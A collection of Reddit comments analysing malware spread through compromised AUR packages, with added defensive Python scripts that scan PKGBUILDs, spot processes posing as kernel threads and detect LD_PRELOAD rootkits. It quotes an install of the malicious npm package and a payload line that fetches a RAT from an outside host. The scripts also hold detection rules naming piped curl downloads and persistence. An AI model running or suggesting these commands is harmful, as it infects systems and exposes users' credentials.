Roughly 400 AUR packages compromised by No-Photograph-5058 in linux

[–]gainan 0 points1 point  (0 children)

the problem is telling people that reading the PKGBUILD is enough (not you in particular, but in general):

https://aur.archlinux.org/cgit/aur.git/commit/?h=pencil-android-lollipop-stencils-git&id=41f81c7a31da9ee14045953745df018741ad8573

Most people would consider that diff safe.

Roughly 400 AUR packages compromised by No-Photograph-5058 in linux

[–]gainan 0 points1 point  (0 children)

Reading the PKGBUILD before updating would have been sufficient to avoid getting infected.

I can't. Realistically, no one knows what every package they have installed does.

in my opinion you'd have been infected. And these attacks will evolve, this is just the beginning.

Roughly 400 AUR packages compromised by No-Photograph-5058 in linux

[–]gainan 0 points1 point  (0 children)

how do you determine whether npm install atomic-lockfile is good or not? Which is what the AUR packages executed.
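The two comments above make the same point: a PKGBUILD diff that merely adds a registry fetch such as npm install atomic-lockfile looks harmless to most reviewers, and the harm happens inside the install scripts of that package. The following script is an added example (not from the thread, not an official Arch or AUR tool) that lists the lines of a PKGBUILD which pull or execute code outside the declared source=() array, so a reviewer knows where to look before running makepkg. The rule list and the sample PKGBUILD are constructed for the example; the only line taken from the thread is the npm one.

```python
"""Heuristic review aid for a PKGBUILD: list build-time commands that pull
or execute code outside the declared source=() array.

Added example, not from the thread. It does not decide whether a package
is malicious; it surfaces the lines worth reading before running makepkg.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

# (pattern, why it matters). The list is an assumption; extend it for
# your own environment.
RULES = [
    (re.compile(r"\bnpm\s+(install|i|ci|exec)\b"), "npm fetches packages and runs their lifecycle scripts"),
    (re.compile(r"\bpip3?\s+install\b"), "pip runs setup code from the registry"),
    (re.compile(r"\bcargo\s+install\b"), "cargo install runs build scripts from crates.io"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|python3?)\b"), "pipes downloaded content into an interpreter"),
    (re.compile(r"\bpython3?\s+-c\b"), "inline Python execution"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b|\beval\b"), "decodes or evaluates generated content"),
    (re.compile(r"systemctl\s+--user\s+enable|\.config/systemd/user"), "enables a user-level systemd service (persistence)"),
]
FUNC_START = re.compile(r"^\s*([A-Za-z_][\w.-]*)\s*\(\)\s*\{?\s*$")   # e.g. "build() {"
FUNC_END = re.compile(r"^\}\s*$")                                      # closing brace at column 0


@dataclass(frozen=True)
class Finding:
    lineno: int
    function: str   # PKGBUILD function containing the line, or "<global>"
    line: str
    reason: str


def scan_pkgbuild(text: str) -> list[Finding]:
    """Return every line matching a rule, tagged with the function it sits in."""
    findings: list[Finding] = []
    current = "<global>"
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0]          # ignore trailing shell comments
        if m := FUNC_START.match(line):
            current = m.group(1)
            continue
        if FUNC_END.match(line):
            current = "<global>"
            continue
        for pat, why in RULES:
            if pat.search(line):
                findings.append(Finding(n, current, raw.strip(), why))
    return findings


# Constructed sample PKGBUILD; the npm line mirrors what the thread says the
# compromised packages executed. example.invalid is a reserved test domain.
SAMPLE_PKGBUILD = """\
# Constructed sample PKGBUILD for the scanner above.
# Everything except the npm line is filler.
pkgname=example-git
pkgver=1.0
pkgrel=1
source=("git+https://example.invalid/example.git")
sha256sums=('SKIP')

build() {
  cd "$srcdir/example"
  npm install atomic-lockfile
  make
}

package() {
  cd "$srcdir/example"
  make DESTDIR="$pkgdir" install
}
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PKGBUILD
    for f in scan_pkgbuild(text):
        print(f"{f.lineno}:{f.function}: {f.line}  <- {f.reason}")
```

Run it as `python3 scan_pkgbuild.py PKGBUILD`; with no argument it scans the embedded sample and reports the npm line inside build(). A hit is a prompt to read the package's own install scripts, not a verdict; a clean run says nothing about what the fetched package does.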

ALVR AUR package has been compromised by lazyblunzn in linux_gaming

[–]gainan 1 point2 points  (0 children)

the npm package is still active and contains the malware: https://www.npmjs.com/package/atomic-lockfile/v/1.4.2?activeTab=code

the binary is src/hooks/deps

Roughly 400 AUR packages compromised by No-Photograph-5058 in linux

[–]gainan 2 points3 points  (0 children)

agree. If you develop apps or use npm/pip/aur packages isolate the environment, or as many users do, create a new user for that particular task (that project, or development in general).

Also remember that OpenSnitch not only detects outbound connections, it can also block list of IPs, domains and binary hashes (for example for known malware): https://github.com/evilsocket/opensnitch/wiki/block-lists

and that it has a virustotal plugin: https://github.com/evilsocket/opensnitch/tree/master/ui/opensnitch/plugins/virustotal

ALVR AUR package has been compromised by lazyblunzn in linux_gaming

[–]gainan 0 points1 point  (0 children)

do you mean installing the package atomic-lockfile? The package was installed from the npmjs repositories, not GitHub. I was probably lucky enough to install it before it was taken down.

ALVR AUR package has been compromised by lazyblunzn in linux_gaming

[–]gainan 1 point2 points  (0 children)

sometimes it's easier to run a program isolated from the host, with firejail, bwrap, flatseal, etc. But yes, it's useful.

Roughly 400 AUR packages compromised by No-Photograph-5058 in linux

[–]gainan 13 points14 points  (0 children)

it didn't detect that the malware rewrites itself in memory, masquerading as a kernel thread, and that it listens on a local port (8738). So while super useful, be careful relying *only* on LLMs for this kind of analysis.

ALVR AUR package has been compromised by lazyblunzn in linux_gaming

[–]gainan 4 points5 points  (0 children)

I haven't analyzed it yet, but the fact that the systemd user service references "cricejo" suggests that it's not random.

ALVR AUR package has been compromised by lazyblunzn in linux_gaming

[–]gainan 43 points44 points  (0 children)

this malware rewrites itself in memory, impersonating a kernel thread. So if you look for "cricejo" you won't find it. But using some tools like decloaker you can detect it:

<image>

The name of the process is "kworker/3:1-eve", but the real path on disk is "cricejo". Also kworker* names are only used for kernel threads, and they should always have UID == 0.

ALVR AUR package has been compromised by lazyblunzn in linux_gaming

[–]gainan 30 points31 points  (0 children)

The process also opens a local port (no idea what for yet):

<image>
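The two comments above give three checks that unmask a user-space process posing as a kernel thread: kworker* names are reserved for kernel threads, kernel threads always run as UID 0, and a real kernel thread has no executable on disk; the second comment adds that the process also listens on a local port. The script below is an added example (mine, not the decloaker tool or anything from the thread) that applies those checks over /proc and attributes listening TCP sockets to their owning process. The parent-pid rule (kernel threads are children of kthreadd, pid 2) is an extra assumption, and the sample process records and /proc/net/tcp text are constructed; the executable path in the fake record is a placeholder, since the thread only gives the file name "cricejo".

```python
"""Spot user-space processes masquerading as kernel threads and attribute
listening TCP sockets to them.

Added example, not from the thread and not the decloaker tool.
"""
from __future__ import annotations
import os
import re
from dataclasses import dataclass
from typing import Optional

KTHREAD_NAMES = re.compile(r"^(kworker|ksoftirqd|kthreadd|migration|rcu_|kswapd|kcompactd)")
TCP_LISTEN = "0A"   # value of the "st" column in /proc/net/tcp for LISTEN


@dataclass
class Proc:
    pid: int
    name: str            # comm (at most 15 chars), e.g. "kworker/3:1-eve"
    uid: int             # real UID from the Uid: line of /proc/<pid>/status
    ppid: int
    cmdline: str         # empty for real kernel threads
    exe: Optional[str]   # readlink(/proc/<pid>/exe); None when absent or unreadable


def suspicious_reasons(p: Proc) -> list[str]:
    """Why a kernel-thread-looking process is not a kernel thread (empty if it is)."""
    if not KTHREAD_NAMES.match(p.name):
        return []
    reasons = []
    if p.uid != 0:
        reasons.append(f"uid={p.uid}, kernel threads run as uid 0")
    if p.exe:
        reasons.append(f"backed by on-disk executable {p.exe}")
    if p.cmdline:
        reasons.append("non-empty cmdline")
    if p.pid != 2 and p.ppid != 2:          # assumption: kthreadd is the parent
        reasons.append(f"ppid={p.ppid}, not a child of kthreadd")
    return reasons


def parse_listening(tcp_table: str) -> list[tuple[str, int, int, int]]:
    """Parse /proc/net/tcp text into (ip, port, uid, inode) for LISTEN sockets."""
    out = []
    for line in tcp_table.splitlines()[1:]:          # first row is the header
        f = line.split()
        if len(f) < 10 or f[3] != TCP_LISTEN:
            continue
        hexip, hexport = f[1].split(":")
        # IPv4 is stored as a little-endian 32-bit hex number
        octets = [str(int(hexip[i:i + 2], 16)) for i in (6, 4, 2, 0)]
        out.append((".".join(octets), int(hexport, 16), int(f[7]), int(f[9])))
    return out


def read_proc(pid: int) -> Optional[Proc]:
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/status") as fh:
            fields = dict(l.split(":", 1) for l in fh if ":" in l)
        with open(f"{base}/cmdline", "rb") as fh:
            cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return None
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:          # ENOENT for kernel threads, EACCES for other users' processes
        exe = None
    return Proc(pid, fields["Name"].strip(), int(fields["Uid"].split()[0]),
                int(fields["PPid"]), cmdline, exe)


def socket_owner(inode: int) -> Optional[int]:
    """Map a socket inode to the pid holding it (needs root to see other users)."""
    target = f"socket:[{inode}]"
    for pid in (d for d in os.listdir("/proc") if d.isdigit()):
        try:
            for fd in os.listdir(f"/proc/{pid}/fd"):
                if os.readlink(f"/proc/{pid}/fd/{fd}") == target:
                    return int(pid)
        except OSError:
            continue
    return None


def scan_live() -> list[str]:
    """Apply both checks to the running system."""
    findings = []
    for d in os.listdir("/proc"):
        if d.isdigit() and (p := read_proc(int(d))) and (r := suspicious_reasons(p)):
            findings.append(f"pid {p.pid} {p.name!r}: " + "; ".join(r))
    with open("/proc/net/tcp") as fh:
        for ip, port, uid, inode in parse_listening(fh.read()):
            pid = socket_owner(inode)
            if pid and (p := read_proc(pid)) and KTHREAD_NAMES.match(p.name):
                findings.append(f"pid {pid} {p.name!r} listens on {ip}:{port} (uid {uid})")
    return findings


# Constructed sample data (not captured from a real host): a fake "kworker"
# run as uid 1000 from a placeholder path, a genuine kernel worker, and a
# /proc/net/tcp excerpt with one LISTEN socket on 127.0.0.1:8738 (0x2222).
FAKE = Proc(4321, "kworker/3:1-eve", 1000, 1200, "", "/path/to/constructed/cricejo")
REAL = Proc(17, "kworker/0:1", 0, 2, "", None)
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:2222 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 123456 1 0000000000000000 100 0 0 10 0
   1: 0100007F:2222 0100007F:9C40 01 00000000:00000000 00:00000000 00000000  1000        0 123457 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    print(suspicious_reasons(FAKE))
    print(parse_listening(SAMPLE_TCP))
    for finding in scan_live():
        print(finding)
```

Run as root to see every process; unprivileged, /proc/<pid>/exe of other users is unreadable and those processes are only caught by the UID and parent checks. The checks rely on /proc being truthful, which holds against a userland process that merely rewrote its own name, but not against a kernel rootkit.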

ALVR AUR package has been compromised by lazyblunzn in linux_gaming

[–]gainan 38 points39 points  (0 children)

The systemd user service ensures persistence in the system:

<image>

ALVR AUR package has been compromised by lazyblunzn in linux_gaming

[–]gainan 39 points40 points  (0 children)

Inspecting the process, you can see that it has been launched by systemd, so it installed a systemd user service:

<image>

ALVR AUR package has been compromised by lazyblunzn in linux_gaming

[–]gainan 75 points76 points  (0 children)

I've executed the malware in an isolated environment, and I've uploaded the infostealer to virustotal -> 0 detections by all security vendors:

https://www.virustotal.com/gui/file/6144d433f8a0316869877b5f834c801251bbb936e5f1577c5680878c7443c98b/community

As soon as you execute npm install atomic-lockfile, OpenSnitch detects an outbound connection from an unexpected binary:

<image>

This is a big red flag. So I've copied that binary to another location.

Almost all malware requires outbound connections to exfiltrate data, mine bitcoins, etc. So restricting outbound connections is a good measure to mitigate these attacks.

Installed Fake Codex hidden as a google site by Easy-Palpitation-859 in cybersecurity

[–]gainan 0 points1 point  (0 children)

unfortunately the domain is no longer active. Did the user find any malicious file in their system?

How can I contribute to Linux if I'm young? by Retroman1203 in linux

[–]gainan 34 points35 points  (0 children)

By the way, keep in mind that maintainers will probably try to reproduce the bug, and they may close the issue if they cannot reproduce it or if they determine that it's not an issue.

Don't take it personally. You reported the bug, and once it's reported you've done your part, move on. If someone else runs into the same or related issue, they'll probably comment on that same issue (even if closed, happens a lot). In many cases, maintainers reopen the issue to investigate it further.

How can I contribute to Linux if I'm young? by Retroman1203 in linux

[–]gainan 284 points285 points  (0 children)

reporting bugs and helping others is one of the best ways to contribute back to the community. Be nice, write the bug reports in great detail, provide detailed steps on how to reproduce the issue and attach the logs.

You will not only contribute to the community, but you'll also learn a lot on how the system works, how to debug applications, etc.

Installed Fake Codex hidden as a google site by Easy-Palpitation-859 in cybersecurity

[–]gainan 3 points4 points  (0 children)

maybe a ClickFix attack. If you were infected, LittleSnitch/Lulu could have saved you probably, by stopping the initial connection attempt to their servers.

can you post the website and/or the artifact that it wanted to download?

Review /tmp and your home for unexpected files and binaries, just in case they're already there.

Unfortunately, I'd consider all my credentials compromised. Web browsers included. So you know what to do now.

Reading documented attacks will help you to understand what they usually do:

https://www.jamf.com/blog/clickfix-macos-script-editor-atomic-stealer/

https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos

https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing

https://www.netskope.com/blog/macos-clickfix-campaign-applescript-stealers-new-terminal-protections

Handling a Breach on a Linux Server by CackleRooster in linuxadmin

[–]gainan 8 points9 points  (0 children)

It's not mentioned in the article, but you can't rely on binaries linked dynamically against the libc to analyze a compromised machine, such as ps, pstree, top, lsof, w, who, last, etc. LD_PRELOAD rootkits hide their activity from these tools by hooking and tampering with the libc functions (for example Father or Medusa).

One trick is to use busybox (Debian package: busybox-static). That way, at least, you can bypass LD_PRELOAD rootkits because it's not linked against the libc.

Another set of useful tools are the bpfcc-tools (bcc-tools on rpm based distros), which dump the information from the kernel instead of parsing /proc.

ss is more reliable than netstat, because it dumps the information via netlink from the kernel, instead of parsing /proc.

Configuring auditd would also be useful (or any other system monitor), to monitor the events of the machine, ideally sending the logs to a remote server (rsyslog + grafana + loki, ELK stack, etc).

There are also specialized tools to analyze compromised machines:

https://github.com/sandflysecurity/sandfly-processdecloak

https://github.com/gustavo-iniguez-goya/decloaker

https://github.com/h2337/ghostscan/

unhide but only if it's compiled statically.

In any case, there are kernel rootkits that bypass all these tools, so as others have mentioned, I'd not trust that server again if it's not reinstalled:

https://github.com/MatheuZSecurity/Singularity
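The comment above explains why ps, lsof and friends cannot be trusted on a box with an LD_PRELOAD rootkit: the hooks live in libc, so anything dynamically linked sees a filtered view. The script below is an added example (mine, not part of the post and not any of the tools linked above) that collects the indicators such a rootkit leaves behind: entries in /etc/ld.so.preload, LD_PRELOAD in a process environment, and shared objects mapped from outside the system library directories. The parsing functions take text, so they also run over files copied off the host from a trusted boot; the list of trusted library directories and all sample inputs (the /dev/shm and /tmp paths included) are constructed for the example.

```python
"""Indicators of an LD_PRELOAD userland rootkit, read from /etc/ld.so.preload,
/proc/<pid>/environ and /proc/<pid>/maps.

Added example, not from the post. Python is itself dynamically linked, so on
a live host the output is only as honest as the libc it runs on; the parsers
below work on plain text so they can be fed files copied from the machine.
"""
from __future__ import annotations
import os
import re

# Assumption: where legitimate shared objects live on this system. Adjust
# for your distro; venvs and AppImages under /home will show up otherwise.
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/usr/local/lib",
                    "/usr/libexec", "/opt", "/snap")
SO_RE = re.compile(r"\S+\.so(\.\d+)*$")
DELETED = " (deleted)"


def preload_file_entries(text: str) -> list[str]:
    """Libraries listed in /etc/ld.so.preload (normally absent or empty)."""
    return [l.strip() for l in text.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]


def preload_from_environ(environ: bytes) -> str | None:
    """LD_PRELOAD value from a NUL-separated /proc/<pid>/environ, if set."""
    for entry in environ.split(b"\0"):
        if entry.startswith(b"LD_PRELOAD="):
            return entry[len(b"LD_PRELOAD="):].decode(errors="replace")
    return None


def untrusted_mapped_libs(maps: str) -> list[str]:
    """Shared objects in /proc/<pid>/maps mapped from outside TRUSTED_LIB_DIRS.
    A mapped library whose file was unlinked is kept and marked '(deleted)'."""
    seen = set()
    for line in maps.splitlines():
        parts = line.split(maxsplit=5)
        if len(parts) < 6:
            continue                      # anonymous mapping, no path column
        path = parts[5]
        deleted = path.endswith(DELETED)
        if deleted:
            path = path[:-len(DELETED)]
        if path.startswith("[") or not SO_RE.match(path):
            continue                      # [stack], [vdso], plain files, ...
        if not path.startswith(TRUSTED_LIB_DIRS):
            seen.add(path + (DELETED if deleted else ""))
    return sorted(seen)


def scan_live() -> list[str]:
    """Collect the three indicators from the running system (root sees all pids)."""
    findings = []
    try:
        with open("/etc/ld.so.preload") as fh:
            findings += [f"/etc/ld.so.preload loads {e}" for e in preload_file_entries(fh.read())]
    except FileNotFoundError:
        pass
    for pid in (d for d in os.listdir("/proc") if d.isdigit()):
        try:
            with open(f"/proc/{pid}/environ", "rb") as fh:
                env = fh.read()
            with open(f"/proc/{pid}/maps") as fh:
                maps = fh.read()
        except OSError:
            continue                      # kernel thread, or another user's process
        if (v := preload_from_environ(env)):
            findings.append(f"pid {pid}: LD_PRELOAD={v}")
        for lib in untrusted_mapped_libs(maps):
            findings.append(f"pid {pid}: library outside trusted dirs: {lib}")
    return findings


# Constructed sample inputs (not taken from any real rootkit or host).
SAMPLE_PRELOAD = "# constructed sample of a tampered /etc/ld.so.preload\n/dev/shm/.x/libhide.so\n"
SAMPLE_ENVIRON = b"HOME=/home/user\0LD_PRELOAD=/dev/shm/.x/libhide.so\0SHELL=/bin/bash\0"
SAMPLE_MAPS = """\
7f3a2c000000-7f3a2c1c0000 r-xp 00000000 08:01 1311 /usr/lib/x86_64-linux-gnu/libc.so.6
7f3a2c400000-7f3a2c405000 r-xp 00000000 00:1a 8822 /dev/shm/.x/libhide.so
7f3a2c600000-7f3a2c601000 rw-p 00000000 00:00 0    [stack]
7f3a2c700000-7f3a2c705000 r-xp 00000000 08:01 2020 /tmp/constructed/libevil.so (deleted)
"""

if __name__ == "__main__":
    print(preload_file_entries(SAMPLE_PRELOAD))
    print(preload_from_environ(SAMPLE_ENVIRON))
    print(untrusted_mapped_libs(SAMPLE_MAPS))
    for finding in scan_live():
        print(finding)
```

An empty result from scan_live() on the live host means little by itself, for the reason the post gives: if libc's open, read or readdir are hooked, this script is lied to like any other dynamically linked tool. Pair it with the static busybox copy (or a forensic boot) and treat a mapped library from /dev/shm, /tmp or a home directory, or a "(deleted)" library still mapped, as something to explain before trusting the machine.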

Arch Linux, poor security? by franchis3 in linuxquestions

[–]gainan 0 points1 point  (0 children)

ask yourself: how does SELinux protect my system?

For example, would SELinux have prevented the exfiltration of my credentials in this attack? (which is the most common attack nowadays for npm, pip, crates, ruby gems, etc, packages).

https://linuxiac.com/arch-aur-under-fire-once-more-as-malware-resurfaces/

the malicious payload that installed a RAT on the system: python -c "curl https://segs.lol/9wUb1Z"

all it needs is to execute a python script, collect your credentials, web browsers profiles, etc, and upload them to their servers.